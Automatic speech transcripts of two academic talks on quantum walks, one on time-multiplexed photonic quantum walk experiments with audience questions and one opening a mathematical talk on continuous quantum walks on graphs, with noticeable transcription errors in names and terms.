talk about quantum walks, and I will try to give one side of the story today, in my talk, and we have a second talk of my group, given by Shum, and he will show you the second side. But really, this is what research is driving. I want to understand what does it mean to go quantum? Now from the experimental side, if you do not want to do that only in theory, but also experimentally, you need a multi-dimensional photonic quantum system. And this is, again, a broader thing. I am not coming from only quantum books. Research, and if you ask where does that research come from, well, it comes from quantum information science and quantum technology. And I think it's fair to say the boom really started in 2001 when Loflam Milburn realized that you can use only Nylnian networks together with measurements to build a full-fledged quantum computer. Those are sides that are still very important. And also in the framework, if you're talking about quantum walks, because it tells you if you combine linear networks with measurements, you achieve something which is amazing. You can have a universal quantum computer. And this is also one of the motivations people ask you, but why are you interested? Why do you think? Because I say, we don't know where really is the border between classical and quantum in general. We think, and then if they, why do you think? I say, well, just go back to Loflam. You see, there you'll see already, it's just a linear network, feed it by photons, and you achieve a universal quantum computer. Somewhere in between, a lot of the algorithms we try to explore will lie. And then, of course, to build this beast, unfortunately, as experimentalists, this is still a tremendous effort. It doesn't matter if it's 10 to the 900 or 1000 photons which you have to put together, we can't do it. This is a matter of fact at the moment. We'd like to say, well, yes, but we can do that. Well, if we are honest, it's difficult. It's horribly difficult. And this is why I showed you these technology tools we need. I think also the development there is not finished yet. We are in the middle of developing these things, but we can't do that. And because we can't do that, quantum walks are perfect because they are kind of one of the simplest things we can do and still they are very meaningful. And I think in this audience, I don't have to make more advertising about the quantum walk, but this is how I see that. On the bottom, talking about photons, I have to talk about that. Implementing multi-photon systems, of course, quantum communication is also important, and their high-dimensional systems are also interesting. So a little bit more of what we do in the group. We have different strategies. We do different work. We do integrate optics. We do something which we call temporal modes of pulse flight. I will not be talking about these two topics. What I want to concentrate in this talk is about time-multiplex quantum walks, which we find a really interesting system to study. With that, let me come to my outline of that talk. I will start with an introduction. I know that you're all familiar with quantum walks, but this is meant to give you my impression how I look into the field. And then I want to talk about quantum walk setups. And again, I thought, because I think there's a lot of new people coming into the field, which is great, it might be also good to give you a little bit of a review of what we have been doing in my group over the last 10 years, and I will come to a new setup there. At the end, I will talk about two applications, which is, well, not really a direct application, the sense that I build a quantum computer, but an application to fundamental science. So let me get started with the introduction. Well, what is a quantum walk? Well, this is my vision of it. You have this drunken person. Well, classically, he throws a coin. Depending on the coin toss, he makes a step to the left and the right, and we are back to the golden board. Research, which is well known, I think, in this community, what you get out of that is a binomial distribution, and you bottle by that diffuses propagation. And this is already telling you, well, you can model propagation by that. This probability distribution is characterized that the variance is proportional to the number of steps. On the contrary, we have the quantum side. We need the coin in, well, in the coin discrete type quantum box. This is how it's formulated. The coin typically is formulated as a spin state. In optics, I prefer to say a polarization. It's exactly the same. Take the Schrodinger representation here, you're back. And depending on the polarization, you make steps to the left and the right. Well, and what you get on that, you get a lot of interferences. You map, monitor the probability distribution, the coins, the quantum state. Of course, you're talking about the superposition principle, and we get a ballistic distribution, and all of a sudden, the variance is proportional to the square of the number of steps. Now, with that few steps, you don't see that big difference, but if you go to 100 steps, you see there clearly the quantum walk and the classical walk. Okay. Already there, putting that on the computer is trivial. If you ask the experimentalist, there you see already the first challenge. You do a few hundred steps, and then you see a few hundred steps. Wait a minute. That's a lot of an awful number of modes. How the heck can you get a few hundred steps to see the differences you want to see? And quite frequently, I should be honest, we are limited to 10 steps, and then it looks more like that. And that's not so impressive. And if you're talking about how the variance spreads, it's also not so impressive. So you already see there one challenge. You really have to get an awful number of steps in the system. If you can do that, the applications we have in mind is, in general, now we go, say, by random walks in classical optics, we know them very well. They're used for all kinds of simulations, classical processes. Here, Brownian motions. For me, it was quite interesting. Like mathematicians, you probably know better than I. This is still a research field, which is really very modern research in mathematics, if you look into that. You can have model biological systems, how tears run around. And information science, well, I think by now it's known that also the Google search is based on random walk algorithms. And then it's not very surprising to say, well, if you do that in classical systems, already to simulate all systems, do the same thing to use a simulator for semiconductors to fix problems. And we can come back to that. Quantum biology, if you want, this again is some topic which is actually by now rather old. And try to see, can we find you, competition, simulation algorithms? And I'm sure you're much more expert than I am. Now what makes a quantum system quantum in that respect? Well, this is, take this famous graph. Well, what really does make it quantum at that point? This is a typical way you say, you have the classical world, you have a particle, and then things are very nice. As soon as you cross the border and you have a single particle, and you have interference phenomena, you have other ways, particle, dualism, and you make it quantum. Well, in optics, it's sometimes a little bit difficult. So the results I will show you today, we criticize always the same thing. Hey, guys, you're not quantum. Yes, if you do come from a classical optics world, and I say that already, yes, we are not quantum. If you look at the modeling, we can perfectly simulate all quantum box theory things. So we have a very integrated interference phenomena, and this makes it quantum. If you like, I'm happy to discuss this issue much more in detail with you, and we are looking into that topic too. I'm putting that already now, because I think quantum is a notion which is rather difficult here, and depends where you're coming from. For computer scientists, they are always perfectly happy with our work. This is a, it's not done by a standard classical computer. An optics person, I'm completely understood, I'm coming also from optics, why they're absolutely not happy with us at all. I like the experiments. I like to see what we can do. So let me go my view on the theory, what we need. Well, this is something which is standard. We need a Hamiltonian which operates on two Hilbert spaces, one on the position space, one on the coin states, and then we have a propagation in this Hilbert space where we operate on these tensor products, and we always have these different coefficients, and this of course is appropriately distributed. In the lab, we start with a single photon which has a polarization, for example, horizontal. We initialize our state, it's in some position, in some polarization. Then the first thing we do is we put it through a coin operator, in our case it's a real coin operator, so that means a half wave plate which changes the polarization according to the coin operator thing, so this is a unitary operation, and this is a general one which we can do with phi's and these, well, we have all kind of different wave plates, for example, Hadamard if you take the right choice, and then depending on the polarization, we have a step operation to the left or the right, and you see that, and this is basically what's a mathematical terms. This is really just introducing how the system works. Now we have done one step, well, if you want to have a quantum walk, we iterate that. So the whole sequence I just showed you, initialize our state, coin operation, step left right, coin operation, step left right, and so on, and at the end, we want to monitor probability distributions, ideally different in coin and position space. Okay, how do we implement this? Well, it's almost there already, so I think I gave you already some way how to implement this. But what are the important features we have to do there, what is this really what you need? And I like to characterize the systems in different way. What do you need? Well, one thing which is I think quite important if you want to do simulations, so if you want to change something, you want to reconfigure your system. So you don't want to have static things, but you want to be able to play with the coins. So reconfigurability is one category. But also equally important, maybe even more important, you need a stable system, because stable for us means that the evolution does what you just showed there. If you don't do anything in the lab, it's getting shaking like crazy, and the phases you just have to integrate all over the place and then that's also not very helpful. And I think one of the most challenging thing you want to have is scalable. And I showed you that at the beginning, you don't want to have five steps, you don't want to have 10 steps. Ideally, you would like to have hundreds and thousands, and I should say this is a challenge as far as I know, if somebody else. So this is really something which is tricky. There are different platforms, and depending on what you want to do, there are advantages and disadvantages. Of course, I have to advertise the time multiplexing here. But bulk optics, and I think, well, this is not a very, well, sorry, up to date, like it's the beginning, but bulk optics, I always said, is very reconfigurable. It has very bad properties and stability and scalability, and I should be careful with that. I know the Charny-Weypans group these days, they do in bulk, just amazing things, but definitely it's more tricky to get them stable and scalable. There's integrated photonics, I think, again, this is a lot of work has been done, and we are also working in that field. I also think that it's really good, but I think it's fair to say that reconfigurability is much more challenging. And time multiplexing, in principle, is a good platform if you want to achieve these things. So let me go to our setups, what we have been doing, the quantum box setups over the last year. So this is the time multiplex setup, and this is the setup where Charny-Weypans works. We have an input set, which we can put into the loop with electro-optic modulators. This is an electro-optic modulator where we can change the internal state together with the half-wave plates. And then we have a double-loop structure. We divide here the state according to its polarization, and it travels through two different loops. It gets recombined, and then we loop it back. And here we couple some of the light out to detect what the system is. So what does that setup do? Well, guess the following. The pulse comes in a single photon state. We have a half-wave plate, and this is the coin operation. This is the double-loop, these two different fibers length. So you see that it's getting split according to its polarization, it travels at different paths. And thus we implement in time the step of our region. The relative shift in time corresponds to the steps in position space. Now here we have come in, here's that, we're at that position, and now we loop it back. What that does is, so we have the first step done, we bring it back to the same system. So we have this. We go through that loop again because it's the equal paths, we can see that here two of the paths overlap again, and depending on the position you complete the first step. And this you iterate over and over again. One dyes feature, you can replace the half-wave plate with electro-optic modulators so we can approach every individual path individually. So we can have the dynamic reconfigurability. And this is actually a quite old system by now. So we started that when the first publication was in 2010. This is from 2011 over at least 28 steps. And here you see this would be the classical system and experiment and quantum box theory, gray and blue. And you see quite nicely that we can reproduce these quantum box really quite nicely. It means that 280 steps would be 4 and 6 beams if you do in bulk in 2090 detectors. And this is still a challenge. I know that we can do these things these days. But I think this is really something which we can do nicely. What I like about this is I say it's resource efficient because we're using the same system again and again. And maybe one thing which is even more important, it has an ideal homogeneity. If you implement it differently, all these elements can be slightly different. You get exponential errors because you're peating over and over again. Here it's always the same error and I think it's a really good thing. This is why we get extremely clean data. What did we do with that? I think we have to speed up a little bit. Okay. Well, the first thing which came to our mind was simulate, go from classical to quantum. And how do you do that? Well we have our quantum box. We artificially first introduce fluctuations by programming all of these different green positions random phases. That corresponds that in position space we have these fast fluctuations. And we chose these phases out of the interval minus pi to pi with pi over 4. And what you expect is that you suppress all interferences and we know that then you go to classical box and you should get your binomial distribution. And here you see what you get. This is actually also data, experiment theory. It fits extremely nicely. On a logarithmic plot you see this parabola. Well another thing then you do say okay. Whatever types of things are interesting. Well the next thing we did is well we did again a random choice but now we did it position dependent. So you see at the same position we also imprinted the same phase at the different times they are completely flat distribution. Well why did we do that? Well this is an unison like localization. So this is what you expect. Momental data and theory and experiment and it works also quite nicely. For us it was the first experiment to see this, to show the strength of the system. And then you can change how much you diffuse your phases, how many different phases you choose and in that way you can have control dynamics here. You see we look at the variances as a measure and you see here first the variances there's no phase and then for these two different scenarios we see nitrogen that behavior also under the localization you go beyond this value of the mean valiant. And this is quite of old work but I thought it's quite interesting to test your mind there because I think it's still up to date and you still can do these things quite nicely. The next step we did is well if you do have one d system can you also do two d system where you have no two position and two coin states. Well what you have to do for two particle quantum walk and it's similar to have two single walkers on a line is you have to have two positions and two coins and a position and coin state for particle one and two and you have a four for this coin. Well for that you can also use your quantum walk the original system with this looped system but we add there now an additional loop. You have empty ports here and what that means is that we can have four kind states by defining linear and vertical procession on the one hand and then two spatial modes so we could travel back either the path we had or we open that second path and now we have a more complicated pattern how the passes can travel so here we come in now we split them and they come here back and now so I think that I mentioned a little bit problem can now walk back also that second path in which corresponds to another coin state. The interesting part of that is and to understand why that all works is not very trivial but the interesting thing is that we can implement highly non-trivial coins because we have half of this here here and also in the path back so we can implement you four dimensional coins which are highly non-trivial and the detection again is done with two detectors there and this is then kind of the time series so we have to have to distinguish between different timelines which corresponds to horizontal and vertical and we study the evolution this was step 10. So what we could do we simulate 12 steps on a 2D Levis with 107 positions and more than 500 modes so this is an experiment from the complexity it's still rather well and controlled and you can do that and there we then looked into the system and you can understand the system quite nicely one interpretation is that you look at coin operations versus spatial operations and what you find is that we had coin operation which is rather non-trivial what means that you can also simulate something like control set gate in the coins and so on and this is an experiment showed that we create inseparability and then by having a dynamic on you could even have something like a post-harp type non-nearity and bound states so basically you can play with that system too and we can study these coherence phenomena so what it showed you was the result from time multipix, we're going to begin in decodance this sort of 2D quantum walks and in the meantime we did a lot of different things but I can't represent all of them so we looked at decodance and losses, we looked at percolation graphs, Markov processing, graph engineering state transfer and we also measured topological invariance so there are different things which you can work and what you can use these quantum walks for. Now I wanted to bring you so this was kind of the review I promised you so this is what you basically can do the systems and we are always happy if you have ideas how I would like can you do the experiments to see and to model that and see can we do these things and I should acknowledge there also I think they really did a great job with us because they said oh this is what we really do there, can you implement that, it's not trivial but you can do a lot of things there. Now in the last year we were looking at our system and at some point if you have been working with 10 years with all this the same system you think okay can we modify it a little bit can we do something new. It's a Maxinda type interferometer and if you go to optics Maxindas are actually not the interferometer you should use all the time. The most prominent interferometer, well they are two very prominent interferometers I brought to you, the one is the Michael Morley experiment I guess a lot of you have had to be doing that in your tutorials because that's one of the things you do and if you look at that LIGO for example they also use a geometry. So from an experimental point of view it's a quite natural question to ask why do we use always this Maxinda geometry. Does it make sense to use in a looped microt interferometer? Does it make any difference? Does it have any advantages? What can you gain from that? So let's have a look at the microphone interferometer so step one again. Okay we still start with a pulse and a coin state which is the polarization and now our interferometer consists of a polarizing beam splitter and then the formula with two different arm lengths. So we start again coin state changes the internal state depending on the internal state. I'm sorry for the animations I realized that I had a different format and it broke all of them I just couldn't repair it in that timeframe but anyhow. So depending on the position you go either up or down, up or to the right and you see this polarization split. Bring them back, come on come back to the coin space and you see because of different arm lengths they will reach at different times and then we have here two different coins again so this is and what's happening now is that depending if you're going back this direction or this direction you have a pulse which can propagate in this direction or in this direction which is counter propagating and co-propagating. What does that mean? So this up to now we had coin and step operation but this different path if you go clockwise or counter clockwise allows us now to implement a four dimensional coin because we have now polarization different delays and which direction you're traveling and the way you can understand that in a visual representation is the following. So we have here the positions so we have still just a quantum block on a line but now we have different paths how we can travel through so you can either go that upper part to the left and to the right which would correspond for example to clockwise or the lower part which is counter clockwise. So you can go back and forth different ways we have one deep quantum block with a four dimensional coin. So this is how that works this is a step operation we have different coins on the one hand we have a coin in the arms which kind of corresponds ever the precision you define if you in which direction you go and we have a coin in the loop so inside the loops and this defines which coin you have a coupling with different quantum blocks and you find this is a nice new tool where you can play with the system. So this is the full setup to start with so here's the input coupling here's again electro optic modulators everywhere in order to completely control them we have 14 for internal degrees of freedom and we label them by clockwise horizontal clockwise vertical counter and so on these electro optic modulators for dynamic control we use supercontacting single photon detectors to get good efficiencies around to efficiencies around 75 percent and this is a the fiber length which defines how the persistence step are actually done. So what can you do with that? The point is that this coin this four dimensional coin is completely controllable and here you see that we can either separate them it depends on how these settings are such that you just have standard quantum walks on lines and thus you expect in counter clockwise and clockwise position just standard quantum walk evolutions if you kind of cut here these coins you have independent evolutions you don't see any special thing and this is what we tested and it works quite nicely it's getting interested as soon as you look at different settings and for example and you start to have coupled quantum walks so basically you start in these different line that you have coupled couplings between clockwise and counter clockwise and you really have this four dimensional walk dynamics and here you see that experiments and what we did is we implemented one of these coupled quantum walks and looked at the theory which simulations here say what do we expect experiments and you see again the similarity is really nicely so this is kind of these two experiments were to see okay is the setup doing what we expect and it's working quite nicely and then we thought okay what can we what else can we do and then one of the challenges and experiments with a few decisions always came in like oh can you implement periodic boundary conditions and I should be honest in our quantum walks it was like periodic boundary conditions is tricky but here you see it already we had coupled and uncoupled how you can do it quite nicely so you implement a system where you cut the links here everywhere and at the edges you keep them connected and then you of course you have to go back to the theory and see if that works but it does so basically what that means we have a very elegant way to implement periodic boundary conditions because is that this thing is nothing else like a circle and this is intrigued us we coupled our light at a position four and we implemented first an identity coin such that we are not expected to be in the furences but we had a diagonal input in the coin space and we expected this triangle to travel basically we just have two pulses which travel along the lines and this is experiment it's related to see that this works quite nicely the next step we coupled we had a coin which was Hadamard coin we see very nicely also then and you expected some points that you have these quality positions of this works so basically what the new tool we bring in there now we are also able to implement in a rather easy way these periodic boundary condition and we can make circles of different sizes so this was for example of 12 different sides again identity sorry this is you I see it better than here but it looks quite nice and also Hadamard coin so periodic boundary condition this is the message I want to convey here yes nowadays we also know how we implement in these quantum works periodic boundary conditions and we have these quantum work with a four dimensional coin and the questions what else can you do and now comes the question what really what's interesting and this is what we are looking for one thing we tried simply because of experiment curiosity can we have coupled circles this is that way you do it again you cut a different position you have a coupling for identity coin we expect that and if you have Hadamard coin you see again these couplings that all works quite nicely and then we submitted and then people are like yeah but what is really kind of the significance of what is it but we really want to see with that coupled systems why is a four dimensional coin different than a two dimensional coin and this is when we started look at the band structure of a 4D coin so if you look at band structures you can have so stick drivel band structures where we only have group velocity two maximum of the group velocities and this is why why these quantum works you see always these spreading in two paths well as soon as we have a four dimensional coin can have band structure with a non-trivial and you have different maximum group velocities and you expect here four different maximum so you should get at this positions quantum works which evolves there and you do see that the theory in simulation that you get kind of power along these lines but you see already here where our system comes to well at its boundaries we need more steps that we see it but already here to have 20 steps is good I think it's experimentally very good but we really would like to have more steps but I think we are quite excited about that and I think there's much more we can do with that we have ideas but if you think okay four dimensional coin is really interesting this is something which we also can do in the lab nowadays so I think I have something like 10 minutes still right the flat yeah this is the experiment sorry this was only the marathon experiment it is it looks exactly like we expect you don't see this branch too much because it's just if you let it run for longer so what about applications and as I promised already it's not an application where say now I put the quantum computer but we really wanted to ask okay what is it what would we like to see and we have an interest in fundamental science and I would I really am intrigued what can we simulate with these things and what makes the system quantum what does make the system quantum well let's go back to the standard quantum mechanics apostolate this is one way to formulate that these are four of them well the system can describe can be described by state vectors and vector space clear the evolution is a unitary evolution so all dynamics is described by that okay fine and to be honest this is I think one way to describe what we do in our time multiplex quantum works where we did all these beautiful experiments we exploited these two things now what's left is measurement in composite systems and if you had asked me for I would say okay they are more quantum in the sense for sure you can't do these things with coherent light not really that we first take on the first one measurement so what about measurements so these dynamics and we know a measurement is rather different than the evolution a unitary evolution and we wanted to test the quantum walk dynamics which is impacted by a measurement so we wanted to look at measurement induced dynamics and then you have to find systems where this makes a difference and one now you go to your beauty colleagues and ask him okay where do measurements make a difference how can we work on that and then they told us well look at recurrence phenomena recurrence phenomena is you start a walk at some point and you ask when is a worker coming back and we can look at two different scenarios the one I would like to call the measurement free regime and the other one the measurement induced regime let me explain what I mean so if I ask does a worker come back if I study position zero two positions zero after sometime or has it come back I have done see how do I verify if I have many steps number that it did come back well I have two ways I take measurements for all for the state evolution zero two and then I just look at the probabilities that the worker did come back at the position zero in step two and I do all these different measurements I put them together and then I calculate the recurrence probability okay and this is measurement free I look in the assortments I'm at with all these different steps I put them together and then I have the phenomena and this is one way to answer that a different thing is when I say okay I always look at that position at zero and I let the evolution involve again I look at the position and let it walls and I only take statistics at the end and ask did it come back these are the formulas how you calculate it turns out that here of course you disturb the quantum work dynamics all the time because we always to take a measurement at position zero as a measurement induced here I don't disturb the dynamics because I look just look into that what's interesting is that if you go for many steps that the limit is different the first came the probability tends to one in the second regime it tends to two over pi and I we thought that's good because this is something we can test experimentally now the question is can you do that how do you do that the interesting thing is you can do that to introduce things what that means is we disrupt our evolution such that we always look only on that one position and now a case you will see how we do that and do the measurement and the rest we let it walls as it was this is set up how you can do that this again the one D loop geometry path is going these are these different fiber lengths where we have these electro optic modulated and modifying the coin space and now we have here the coin what we added in addition there is these electro optic modulator because this is one process so this is for example horizontal working and then it looks back and there's vertical looks back if you switch at that position the procession only for one thing now we switch it from horizontal to vertical and the porous imping strength that are let it transmit couples it out only where we had it in here we do the opposite typically it would reflect back but we have coupled it out and this you can do position resolved you always couple all right out at specific positions we call that sink we can measure that and we can make the evolution work and this way well this is we could test that so we first did the quantum walks with different steps size and looked at the positions and then we did it with that measurement and you see clearly all the difference and then if you are able to do it over that sufficient steps so you see the increasing slowly in the number of steps size of 35 steps you could really have these different regimes and have two to three minutes left we like that a lot because I think it shows you nicely how you control these coherences and what we introduced we introduced a loss basically which operate on the whole pause and we published that then if you just came to us and say well if you can do we can also test the relation between non-classicality and coherent theory you have to do this experiment which is very similar also with things we're on the one hand we want to see if you just let the evolution go over n steps and see what the evolution does and get the probability distribution of these things and then the other one we want to test more classical theory by that you gain interrupt the evolution but now we block instead of only one position only we only let one pass and we can block different sides as you see so we block all this and then check for these different evolutions and this situation we can measure conditional probabilities where we had this interruption here we didn't have that interruption and this corresponds to a combined probability distribution and this is just a probability distribution of the whole work now from a classical perspective if I have the conditional probabilities and put them together that doesn't make a difference if I have all the conditional probabilities and everything which makes a difference between that is because of quantum coherence in the system so this is basically the quantum coherence test and this is for classical combined conditional distributions now these two evolutions if you put them together there is a difference and the difference between these statistics is generated by the coherence and converted into a population I think that's quite nice because now we have a quantitative measure or way to see how the coherence of quantum work which we know how this is related to a non-classicality in correspondence to conditional probability distribution and then you measure on the one hand the Kolmogorov non-classicality that basically means we could how we could explain with classical thing and ask if you have this conditional probabilities what you expect on the other hand we look at the coherence generated and detected in these undisturbed coherent evolutions and what you find is that they correspond one to one so this is the experimental data the offset we know where it comes from it's actually an experimental imperfection how well you can couple out on the whole line so you see the experiment but I think that's really nice and I told you I'm interested what is the difference what is the classical and quantum work and this is I think a nice way to see how you can test these systems in the experiment my time is almost over I guess so let me sum up what did I show you in this presentation well I started with an introduction and this introduction was basically well to show you what we do and show you what I believe why we start we set up our time at the next quantum works and what their big strength is they are reconfigurable they're stable and to some extent scalable and I should say for us this is still a big challenge we're working on that in different ways and we know we have to scale up systems but this is not trivial I showed us our quantum box setups here's the 1d loop geometry we can do 2d loop geometries and the newest geometry the Mike's type geometry but we can implement quite nicely on a one-dimensional quantum box a four-dimensional coin and this brings for example the power that we can have boundary conditions and then I looked at applications where we studied already what makes the difference between classical and quantum's we looked at the recurrence for a phenomenal measurement to use phenomena and non-classically worth coherence before really coming to the final end I really would like to acknowledge the work by the collaborators we did all these quantum work experiments wouldn't have happened if it was not EX together our God please great come to the battle of potashik Martin Stefanak who 10 years ago came to us or maybe it's 15 years say we have that idea can't we do this quantum work experiments and I think we did great work and we developed all kinds of different experiments I also wanted to acknowledge in the latest work which is done by Martin clean Martin clean is in our hookahs group and we really rely heavily the future tell us what would be interesting where should we go and I think it's a nice way of collaborating in that sense and the next question is where should we go with that what is the outlook I restored some of the things and of course as experimentalists we also have ideas and I like this picture lot I think there's a classical word where we're playing with particles at least this is one way as soon as you go to super positions we go wild or very partly dualism but if you're talking about photons this is kind of classical optics but there is this boundary and I think there's yet another boundary which we have to cross to look at well what quantum optics people like to talk genuine quantum effects what that means is we would like to understand better how does the multi-particle dynamics both on dynamics impact that thing and I told you at the beginning we have a low qc and we know as soon as we put conditioning measurements but we also need the fundamental effect so effects which come from multi-particle effects how is the interplay in one to quantum system become complex computational complex and you know I've not been talking about bosom sampling but this is definitely highly related to that question you have first results on that too in this afternoon so some day they will talk about that now I'm inviting you to this talk and finally I also have to acknowledge the work of my group it's not only me it's really the whole team in particular Sonia Park of me and spelling Trump Thomas Nietzsche and then at Lord's and others but they kind of make this work happen because otherwise I wouldn't be standing here so thank you very much for your attention in that case that the expected return time should be an integer have you thought of doing an experiment maybe you have done it already that would test some something like that no but I'd love to talk about that okay I think we had already but it's long time ago okay thank you so you seem to have been implementing the moving shift the shift operator that if you apply over and over the particle go to the same direction can you implement the flip flop shift operator so if apply twice the particle go back to the same position with the four-dimensional coin we can let me try to I think we can because let me try to find that I would have to think about that but I guess I think one way we haven't done it but one way you might want to do is go there and there back it's an afforded mental coin so if you have it so what do you want to do apply twice and then you back at the same position it must be the shift not the coin so if you apply the shift twice the particle must go back to the same position I'm not sure but you might have a chance with a four d coin by simulating with a four d coin just a one d system I'm not sure I have another question okay so there is those results about quantum supremacy and Google is claiming that we now have quantum supremacy so my question is why the quantum community couldn't go ahead and implement something that couldn't be simulated by a classical computer okay my answer is twofold first of all talking about quantum supremacy and photonics I'm not aware that somebody has succeeded there I'm looking in the audience but I'm pretty sure that we don't have 50 photons in a linear network yet so this is well there are different difficulties this is why I have a whole group doing integrated optics I wouldn't say that there's no chance but we probably need better systems because the probabilities of the way we are generating single photons is by heralding so we have a two photon pros and herald one I calculate that if you want to do that 50 times what the probability that this happens will be so this is just a just experimental challenge there's quantum dots but the photons community definitely wants to go there now and I can only answer you from a photon's perspective maybe there's other ways but I think the other thing is more interesting why do the theory not exist and this is really what I find intriguing we know that the boson sampling network if you want you can implement well we can write down a quantum it's a quantum work come on it's just linear couplings and if you then I'm pretty sure that you can convert that to a quantum work with some randomized coin pattern but it's a very specific circuit there I think quantum works an ideal tool to understand what structure is needed yet to go from classical systems to something which is in the range of the quantum supremacism and actually we are talking with computer scientists about that and I think the answer is simply it's a hard topic so we as experimentalists we find really hard and I think if this community goes in the direction to ask what kind of quantum walks with many walks would lead to a system which is similar can be simulated which can't be simulated there's a highly interesting question but you're writing the asking the wrong person I'm out there I'm experimentalist I'm doing things I give the question back to the to the audience if I may add there is a quantum circuit called IQP and by Michael Brenner and Richard Jouza so they approved assuming this polynomial hierarchy is called and they proved if the quantum circuit start with hard mode and then diagonal and another hard mode is hard oh that's interesting to simulate classically so they said I can send you yeah and then we follow that up because relating to quantum work if you and try to do quantum work on circular graph circular graph as I said yesterday can be diagonalized by Fourier so what we have is Fourier start diagonal and Fourier we claim Fourier is harder than hard mode on that basis quantum work on circular graph should be hard classically okay okay thank you this is that I knew that it's not okay yeah I just what may I ask a question so you did a 1d and 2d like this how difficult it is to implement quantum work on arbitrary kind of more complex more interesting graph circular graph um I think the question is a little bit more intrigue it depends when you give me a graph I can try to implement that and then there are some things which are easy and something which is hard for example I want to go to 4d in positional space the system to have more more loops is trivial but then how what about the coin you get a lot of decoupled coins and then it's probably not useful because it's just a lot of one d quantum walks we stick together this is why I showed the 2d quantum walk there we had it not only a two-dimensional grid but the coin was not trivial you understand so it's not only the graphs but you also have to ask can you implement the graph in the complete set of coins or at least a lot of coins which are meaningful this is also why we like with four-dimensional coin a bit and how hard it is in general I think you can't say you have to have a specific problem and have to find good ideas how to implement that that answer okay okay yeah so that's actually I have a question that's thank you so much for the beautiful talk and this is you mentioned at the beginning of the part and that's the you listing up the three of that this is needed on the requirement of the good platform and that's the in the you demonstrated that scalability on something and that's the linear optics technique and also that but you have the strong image about this stability but it's there that's the good indicator of the stability issue okay let me try to answer first the stability so the stability I think the best indicator that you have a stable system is that the walk if you don't behave exactly like you expect from an absolute stable system the reason why we have its stability is by clever design yeah basically the pulses which meet again have always traveled the same path lengths and the time difference between them is only milliseconds and this is the design so this is it looks very simple but it's designed such that any fluctuations in phase doesn't hurt this system and there's other things I should say if we try to initialize our walk with multiple walkers in parallel then we run into stability issues so then we have to play tricks and you're thinking about these things too but in the things that I showed the setup itself the circuitry can be stable but there are challenges if you want to look into that what was the second question yeah that's a quantitative we didn't consider that necessarily because but I even wouldn't know how to do that no we didn't because we see that it's highly stable but okay okay we can continue the discussion over the coffee break and but possibly thanks speaker again and
|
Photonic quantum systems, which comprise multiple optical modes, have become an established platform for the experimental implementation of quantum walks. However, the implementation of large systems with many modes, this means for many step operations, a high and dynamic control of many different coin operations and variable graph structures typically poses a considerable challenge. Time-multiplexed quantum walks are a versatile tool for the implementation of a highly flexible simulation platform with dynamic control of the different graph structures and propagation properties. Our time-multiplexing techniques is based on a loop geometry ensures a extremely high homogeneity of the quantum walk system, which results in highly reliable walk statistics. By introducing optical modulators we can control the dynamics of the photonic walks as well as input and output couplings of the states at different stages during the evolution of the walk. Here we present our recent results on our time-multiplexed quantum walk experiments
|
10.5446/54097 (DOI)
|
Thanks. And I'd like to thank the organizers for inviting me here. Now, you're going to have to cut the problems with this talk. One will be the Australian accent, which I can't do anything about. And another is that I'm a mathematician, not a physicist, and so there will be some culture gaps, but we'll try and deal with that. So, I'm going to start with the Australian accent. I'm going to start with the Australian accent. I'm going to start with the Australian accent. I'm going to start with the Australian accent. And so there will be some culture gaps, but we'll try and deal with that. So, there are a number of areas, a number of problems that arise from quantum computing that have overlap graph theory. And quantum walks is one of them. And so today I'm talking about some work on continuous quantum walks. So, I'm going to start by going over some background, most of which is sort of completely trivial, but it may at least get you used to the notation I'm using. So, one thing I should say is that, okay, I'm talking about open problems, questions that I would like to solve or see solved. And to provide motivation, I'm going to talk about some of the work we've been doing, and the work has been, by and large, with this group of people, so, which, how many, how many of you are here? So, it's joint work, and I'll try and be accurate, but there we go. From my point of view, the stuff that I'm talking about starts with these three papers. So, these are standard, I don't think anybody's surprised. And so, everything's built from this, from those papers. I'm a graph theorist, and so my interest, like, a continuous quantum walk is a walk on a graph. And so, what I'm interested in is the relation between the properties of the walk and the properties of the graph. I might hope that by seeing if I get some unusual property in the walk, it'll say something interesting about the graph. So, I'm going backwards and forward between the graphs and the physics, if you like. So, the, but let's just write down a few things just to fix notation. So, I'm going to have a graph X, which is, that's not standard, and it's got an adjacency matrix, which is the zero and matrix symmetric, and with zeros, then a diagonal. The plasmon will come later on, but I'll generally be using the adjacency matrix. And if we have an initial state given by a density matrix, the state of the system of time t will be given by that expression there. So, this is describing a quantum walk, the initial state, the state of time t is given. And so, that's the framework that we're working in. The, usually the initial state, I tend to write it in terms of vectors, but you guys prefer bras and kets, so I've done both just to prove them bilingual. So, usually the initial state would be in a simple form, and you're carrying out your measurements at time t in the standard basis. Now, you have other choices, but this is common and covers most of the, many of the situations you're dealing with, okay. Now, I think, don't think anybody here has any doubt about any of this, but this is just my notation. And of course, I've got my Schrodinger's equation going backwards in time, but it doesn't matter. Yeah, come on. So, the, for a continuous quantum walk with transition matrix U of t, well, the entries of U of t have got phase factors in there. If you carry out a measurement, then all the information you get is contained in what I call the mixing matrix, which is the sure product of U of t with its complex conjugate. In other words, to get M of t from U of t, I just take the square of the absolute value of each entry of U. So, this is a well-defined matrix. It's got the advantage of being real. The entries are non-negative because they're squares of absolute values. Each row sums to one because U is unitary. Each column sums to one. It's symmetric as U of t is symmetric because the adjacency matrix is symmetric. And so, it's often more convenient to state questions in terms of quantum walks in terms of the mixing matrix rather than the U of t itself. Anything you can measure experimentally is contained in the mixing matrix. Everything else is phase factors, which are not physical. Okay, so to give a very simple example, I'm going to take my graph to be the complete graph on two vertices. Then the matrix is very simple. And in this case, you can work out in more than one way what U of t is. And this is a mixture of cosines and sines. That's the entry matrix. As I said before, it's symmetric. And there's the mixing matrix. And you see a new proof that cos squared plus sine squared is equal to one because each row is sum to one. So, that would be the mixing matrix. So, that's the easiest possible case, although it's not trivial, as we'll see. Now, I'm interested in properties of the walks, and I can illustrate these properties already on K2. Okay, we look at what happens at various times. Okay, and I was assuming three cases, pi and four, pi and two and pi. Now, at time pi and four, the entries of U all have the same absolute value. So, the mixing matrix will be one-half, one-half, one-half, one-half. Okay, and that's referred to as uniform mixing. The case that people would most interest in is the second one, pi and two. Well, M of t would be zero, one, one, zero. This corresponds to perfect state transfer. So, and the third one is simply if you go to time pi, then U is minus the identity, and so M of t is just the identity. So, you're back to where you started, and this is what's called periodicity. Now, periodicity is not too much used in practice since you don't normally want to get back to your initial state, and there are cheaper ways of doing it than running the walk. But the issue is that if you have perfect state transfer between two vertices at time t, then you're guaranteed to have periodicity on each of those vertices at time 2t. So, periodicity comes with perfect state transfer. And when you're trying to decide whether some graph admits perfect state transfer, it's generally easiest to first look for the periodic vertices and then test which ones 